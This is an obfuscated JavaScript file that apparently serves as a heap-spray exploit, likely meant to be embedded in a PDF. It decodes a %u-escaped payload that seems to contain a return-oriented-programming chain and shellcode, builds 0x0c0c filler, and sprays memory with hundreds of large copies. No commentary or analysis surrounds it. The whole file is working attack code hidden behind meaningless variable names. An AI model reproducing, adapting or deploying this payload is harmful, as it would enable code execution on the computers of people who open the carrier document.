var mtxYQGtmesavGIBWekCTAkZVJGGBFNWsyvWYzdbFXBmaAUEZNBICXteKpYuyrcofgjYdSt =
  unescape
var vQZodWURYVYilwDFMXqiYDiWMNLtWQIvaBwvVyfvvECQwKfSn =
  mtxYQGtmesavGIBWekCTAkZVJGGBFNWsyvWYzdbFXBmaAUEZNBICXteKpYuyrcofgjYdSt(
    '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uc5da%u08be%u9e26%ud91d%u2474%u5df4%uc931%u49b1%u7531%u8319%ufced%u7503%uea15%u62d3%u63f5%u9b1b%u1306%u7e95%u0137%u0bc1%u956a%u5e81%u5e87%u4ac7%u121c%u7dc0%u9895%ub336%u2d26%u1ff7%u2ce4%u5d8b%u8e39%uadb2%ucf4c%ud0f3%u9dbf%u9fac%u3112%ue2d8%u30ae%u690e%u4a8e%uae2b%ue07b%uff32%u7fd4%ue77c%u275f%u165d%u34b3%u51a1%u8eb8%u6051%udf68%u529a%ub354%u5aa4%uca59%u5de1%ub982%u9e19%ub93f%udcd9%u4c9b%u47fc%uf66f%u7924%u60bc%u75ae%ue709%u99e8%u248c%ua683%ucb05%u2f44%uef5d%u6b40%u8e05%ud1d1%uafe8%ubd02%u1555%u2c48%u2f81%u3913%u1d66%ub9ac%u16e0%u8bdf%u8caf%ua077%u0a38%uc78f%uea12%u361f%u0a9d%ufd09%u5ac9%ud421%u3171%ud9b1%u95a7%u75e1%u5518%u3652%u3dc8%ub9b8%u5d37%u13c3%uf750%uf439%uaf9f%u85db%uad48%u84db%u3833%uec3d%u6c53%u9995%u35ca%u3b6d%ue012%u7b0b%u0698%u32eb%u6369%ua3ff%u3e99%u655d%u95a5%u8ac8%u1133%udc5b%u1bab%u2aba%ue474%u20e9%u70bd%u5f52%u94c2%u9f52%ufe94%uf752%u5a40%ue201%u778e%ubf35%u771a%u136c%u1f8c%u4a92%u80fa%ub96d%ufdfa%u84bb%uf778%ue4c9%u4140'
  )
var GwY =
  mtxYQGtmesavGIBWekCTAkZVJGGBFNWsyvWYzdbFXBmaAUEZNBICXteKpYuyrcofgjYdSt(
    '%u0c0c%u0c0c'
  )
while (GwY.length + 20 + 8 < 65536) {
  GwY += GwY
}
kPXWMOgkrFjVUQJYHCswdbiWkNJmyaQkkVMD = GwY.substring(0, 1524)
kPXWMOgkrFjVUQJYHCswdbiWkNJmyaQkkVMD +=
  vQZodWURYVYilwDFMXqiYDiWMNLtWQIvaBwvVyfvvECQwKfSn
kPXWMOgkrFjVUQJYHCswdbiWkNJmyaQkkVMD += GwY
pwCkf = kPXWMOgkrFjVUQJYHCswdbiWkNJmyaQkkVMD.substring(0, 32768)
while (pwCkf.length < 524288) {
  pwCkf += pwCkf
}
saDcwPQYkKmJWhkxXGhsnlgpJkxsaIdCQZoDQdQFUJTwmizpmviCEhHxzspKbbEkXbonTffwPWn =
  pwCkf.substring(0, 522228)
var YjnNRuXzDoPUIxdKcTlObeFnfCzdeTnWrKZAfEcJEJrqTJkizpUHpjkwKjMXCgIxcVqprVKJER =
  new Array()
for (
  sOZXUUDKyaibYgsLIAgtzrrryxdYTwruuLgSurTnuXaLUUHsyVohtTnTMpuEQEcbLZthbaGKfLBAr = 0;
  sOZXUUDKyaibYgsLIAgtzrrryxdYTwruuLgSurTnuXaLUUHsyVohtTnTMpuEQEcbLZthbaGKfLBAr <
  496;
  sOZXUUDKyaibYgsLIAgtzrrryxdYTwruuLgSurTnuXaLUUHsyVohtTnTMpuEQEcbLZthbaGKfLBAr++
) {
  YjnNRuXzDoPUIxdKcTlObeFnfCzdeTnWrKZAfEcJEJrqTJkizpUHpjkwKjMXCgIxcVqprVKJER[
    sOZXUUDKyaibYgsLIAgtzrrryxdYTwruuLgSurTnuXaLUUHsyVohtTnTMpuEQEcbLZthbaGKfLBAr
  ] =
    saDcwPQYkKmJWhkxXGhsnlgpJkxsaIdCQZoDQdQFUJTwmizpmviCEhHxzspKbbEkXbonTffwPWn +
    's'
}
